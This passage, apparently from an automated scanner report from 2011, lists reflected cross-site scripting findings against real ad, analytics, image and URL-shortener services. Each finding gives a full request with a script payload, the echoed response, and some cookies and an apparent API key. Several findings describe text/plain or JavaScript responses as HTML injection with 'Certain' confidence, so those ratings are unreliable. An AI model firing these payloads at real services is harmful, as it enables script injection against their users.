Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 106
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:46 GMT
Connection: close

Unable to find /ProvideCommerce/PCR10_0000009A230X_85266_W1_SQdc8f1<img src=a onerror=alert(1)>351d0d588f3

5.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload d3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb was submitted in REST URL parameter 9 and was echoed as d3241<img src=a onerror=alert(1)>b814b4c37bb in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img%20src%3da%20onerror%3dalert(1)>b814b4c37bb?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:55 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_000000011F48_0138343_W1_SQd3241<img src=a onerror=alert(1)>b814b4c37bb

5.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied unencoded into the body of the application's response. The payload 6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171 was submitted in REST URL parameter 9 and was echoed as 6af88<img src=a onerror=alert(1)>3334b396171 in the body of the 403 response.

The echoed payload carries an onerror event handler, so the response body contains attacker-controlled markup and JavaScript. Note, however, that the response is served as Content-Type: text/plain rather than text/html: a browser that honours the declared type renders the body as text and never executes the handler, so the handler fires only in a client that sniffs the body as HTML, and the response sets no X-Content-Type-Options: nosniff header to forbid that. The Severity and Confidence ratings should be read with that caveat.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img%20src%3da%20onerror%3dalert(1)>3334b396171?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:35 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ6af88<img src=a onerror=alert(1)>3334b396171

5.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a was submitted in the REST URL parameter 9. This input was echoed as 908f9<img src=a onerror=alert(1)>5ff4f03be4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (the onerror attribute of the injected img tag) to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img%20src%3da%20onerror%3dalert(1)>5ff4f03be4a?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:57 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_00000011A98X_114727_W1908f9<img src=a onerror=alert(1)>5ff4f03be4a

5.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e was submitted in the REST URL parameter 9. This input was echoed as 5b198<img src=a onerror=alert(1)>c4c8409ea3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (the onerror attribute of the injected img tag) to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img%20src%3da%20onerror%3dalert(1)>c4c8409ea3e?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:27 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ5b198<img src=a onerror=alert(1)>c4c8409ea3e

5.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049 was submitted in the REST URL parameter 9. This input was echoed as 231ab<img src=a onerror=alert(1)>e6d8d6db049 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (the onerror attribute of the injected img tag) to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img%20src%3da%20onerror%3dalert(1)>e6d8d6db049?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:04:58 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ231ab<img src=a onerror=alert(1)>e6d8d6db049

5.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2 was submitted in the REST URL parameter 9. This input was echoed as e2157<img src=a onerror=alert(1)>5531a670ae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (the onerror attribute of the injected img tag) to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img%20src%3da%20onerror%3dalert(1)>5531a670ae2?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:54 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQe2157<img src=a onerror=alert(1)>5531a670ae2

5.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430 was submitted in the REST URL parameter 9. This input was echoed as 4b059<img src=a onerror=alert(1)>6709cddd430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (the onerror attribute of the injected img tag) to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img%20src%3da%20onerror%3dalert(1)>6709cddd430?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 108
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:05:43 GMT
Connection: close

Unable to find /ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ4b059<img src=a onerror=alert(1)>6709cddd430

5.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4 was submitted in the REST URL parameter 9. This input was echoed as 76672<img src=a onerror=alert(1)>2c03fb67eb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses an event handler (the onerror attribute of the injected img tag) to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b76672<img%20src%3da%20onerror%3dalert(1)>2c03fb67eb4?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Sun, 04 Sep 2011 01:06:20 GMT
Connection: close

Unable to find /ProvideCommerce/p0084749b76672<img src=a onerror=alert(1)>2c03fb67eb4

5.27. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ebb35<script>alert(1)</script>63fe973072f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f?d=2925993182975414771 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168296542x0.096+1314892454x-365710891"; rb2=EAE; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUirOLM3IrzEsr0xMN6sxqjEsyShW0lFKSszLSy3KBKtQqq0FAA%3D%3D"; vsd=0@1@4e60f636@www.garage4hackers.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Sun, 04 Sep 2011 00:59:04 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f

5.28. http://api.bit.ly/shorten [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 75787<script>alert(1)</script>6092a370891 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL75787<script>alert(1)</script>6092a370891&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:09 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "5c2db80dd5e3e6ca46557b8c7b52447844cb349e"

processBitlyURL75787<script>alert(1)</script>6092a370891({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904": {"userHash": "qjnyKb", "shortKeywordUrl": "", "hash": "q7VV6y",
...[SNIP]...

5.29. http://api.bit.ly/shorten [longUrl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 6fd73<script>alert(1)</script>6c37e9d4b was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "e4aae6323c61daeb31d345afaa81c9ae9ccce2b8"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b": {"userHash": "ooSyTz", "shortKeywordUrl": "", "hash": "q1d6Wf", "shortCNAMEUrl": "http://reut.rs/ooSyTz", "shortUrl": "http://reut.rs/ooSyTz"}}, "statusCode": "OK"})

5.30. http://api.echoenabled.com/v1/search [q parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<a>00081b2be27 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16106635923383291811_1315097306218&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904+36fdf<a>00081b2be27&appkey=prod.reuters.com&_=1315097329735 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16106635923383291811_1315097306218({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"36fdf<a>00081b2be27\" at 299" });

5.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 8ef90<script>alert(1)</script>12b53f97162 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=78ef90<script>alert(1)</script>12b53f97162&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:08 GMT
Date: Sun, 04 Sep 2011 01:11:08 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"78ef90<script>alert(1)</script>12b53f97162", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload b5525<script>alert(1)</script>cfd9ca8e7d0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=b5525<script>alert(1)</script>cfd9ca8e7d0&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:12 GMT
Date: Sun, 04 Sep 2011 01:11:12 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"b5525<script>alert(1)</script>cfd9ca8e7d0", c16:"", r:""});



5.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e62e9<script>alert(1)</script>9e2b676467b was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888e62e9<script>alert(1)</script>9e2b676467b&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
